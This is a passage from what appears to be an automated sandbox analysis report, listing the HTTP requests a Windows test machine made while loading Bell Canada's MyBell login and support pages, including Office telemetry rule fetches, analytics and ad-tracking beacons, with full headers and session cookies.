TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mybell.bell.ca/Login?language=enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; mbox=session#e8acc2285415480dbbf54ad6f854a96e#1730382191|PC#e8acc2285415480dbbf54ad6f854a96e.37_0#1793625131; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /dcm?pid=5c420d2b-f139-4fee-b0c0-89a7b8ce9433&dcc=t HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A416tCsuyE62q0ke3351vrU|t
Source: global trafficHTTP traffic detected: GET /wdccan/36793/onsite/generic1730279018395.js HTTP/1.1Host: resources.digital-cloud.medallia.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/bell_common.js?async HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Login?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; mbox=session#e8acc2285415480dbbf54ad6f854a96e#1730382191|PC#e8acc2285415480dbbf54ad6f854a96e.37_0#1793625131; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; rxvt=1730382139586|1730380318420; dtPC=8$580338487_402h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3; da_lid=B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_intState=; __bda_combined=s_vnum^1732972343971&vn=1|s_invisit^true|prev_pgn^Login|prev2_pgn^|prev_pgn_clpv^Login|prev2_pgn_
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; rxvt=1730382139586|1730380318420; dtPC=8$580338487_402h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3; da_lid=B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_intState=; __bda_combined=s_vnum^1732972343971&vn=1|s_invisit^true|prev_pgn^Login|prev2_pgn^|prev_pgn_clpv^Login|prev2_pgn_clpv^; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|1|e91484a733d016678ba1bae1c170fcf9da65ba
Source: global trafficHTTP traffic detected: GET /ibs:dpid=121998&dpuuid=154887fb7993fab4238c648c733996f4 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926|139200-1-1730380339124
Source: global trafficHTTP traffic detected: GET /td/rul/953414520?random=1730380345423&cv=11&fst=1730380345423&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUluOG7rAMHEbdj-Ua_R3N0vCtoIba9CQhUZwM7uJdinHDgXKrZfaghEmRLXyZM
Source: global trafficHTTP traffic detected: GET /ibs:dpid=30064&dpuuid=%7BUUID_6j5b2cv%7D HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926|139200-1-1730380339124
Source: global trafficHTTP traffic detected: GET /ibs:dpid=73426&dpuuid=26594250982175076714259318767746782479 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926|139200-1-1730380339124
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ibs:dpid=30646?dpuuid=y-0lAI.WpE2pHUbvKJtuuYuEn5gUZrLYWmeXs-~A HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926|139200-1-1730380339124
Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-MTKGWZ28E4&gacid=1209393833.1730380347&gtm=45je4as0v882555574za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533422~101823848~101878899~101878944~101925629&z=1413467012 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUluOG7rAMHEbdj-Ua_R3N0vCtoIba9CQhUZwM7uJdinHDgXKrZfaghEmRLXyZM
Source: global trafficHTTP traffic detected: GET /wdccan/36793/onsite/embed.js HTTP/1.1Host: resources.digital-cloud.medallia.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /iframe_api HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ibs:dpid=139200&dpuuid=Evue4Ii4QR6r3bJYhzcsag&redir=https%3A%2F%2Fs.amazon-adsystem.com%2Fecm3%3Fex%3Dadobe.com%26id%3D%24%7BDD_UUID%7D HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926|139200-1-1730380339124
Source: global trafficHTTP traffic detected: GET /m2/bellcanada/mbox/json?mbox=target-global-mbox&mboxSession=e8acc2285415480dbbf54ad6f854a96e&mboxPC=e8acc2285415480dbbf54ad6f854a96e.37_0&mboxPage=069d409e300449049cc9fb6d597b6dd1&mboxRid=5aab41e5dc814d24ac07652f52c146c2&mboxVersion=1.8.2&mboxCount=1&mboxTime=1730365944237&mboxHost=support.bell.ca&mboxURL=https%3A%2F%2Fsupport.bell.ca%2FBilling-and-Accounts%2Fmanage_your_bell_services_on_the_go%23EXT%3DMOB_URL_branch_getapploginpage_012423_MH&mboxReferrer=&browserHeight=907&browserWidth=1263&browserTimeOffset=-240&screenHeight=1024&screenWidth=1280&colorDepth=24&devicePixelRatio=1&screenOrientation=landscape&webGLRenderer=ANGLE%20%28Google%2C%20Vulkan%201.3.0%20%28SwiftShader%20Device%20%28Subzero%29%20%280x0000C0DE%29%29%2C%20SwiftShader%20driver%29&lob=&dflob=&language=en&province=on&footprint=&PostalCode=&LoggedInStatus=false&epp_company_code=dock%20is%20not%20present%3Ai&profile.IspCheckAvail=false&mboxMCSDID=072439601D5CACF0-7EA83BB21298A984&mboxMCGVID=26404690240998747124274156036452379072&mboxAAMB=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&mboxMCGLH=6 HTTP/1.1Host: somni.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; 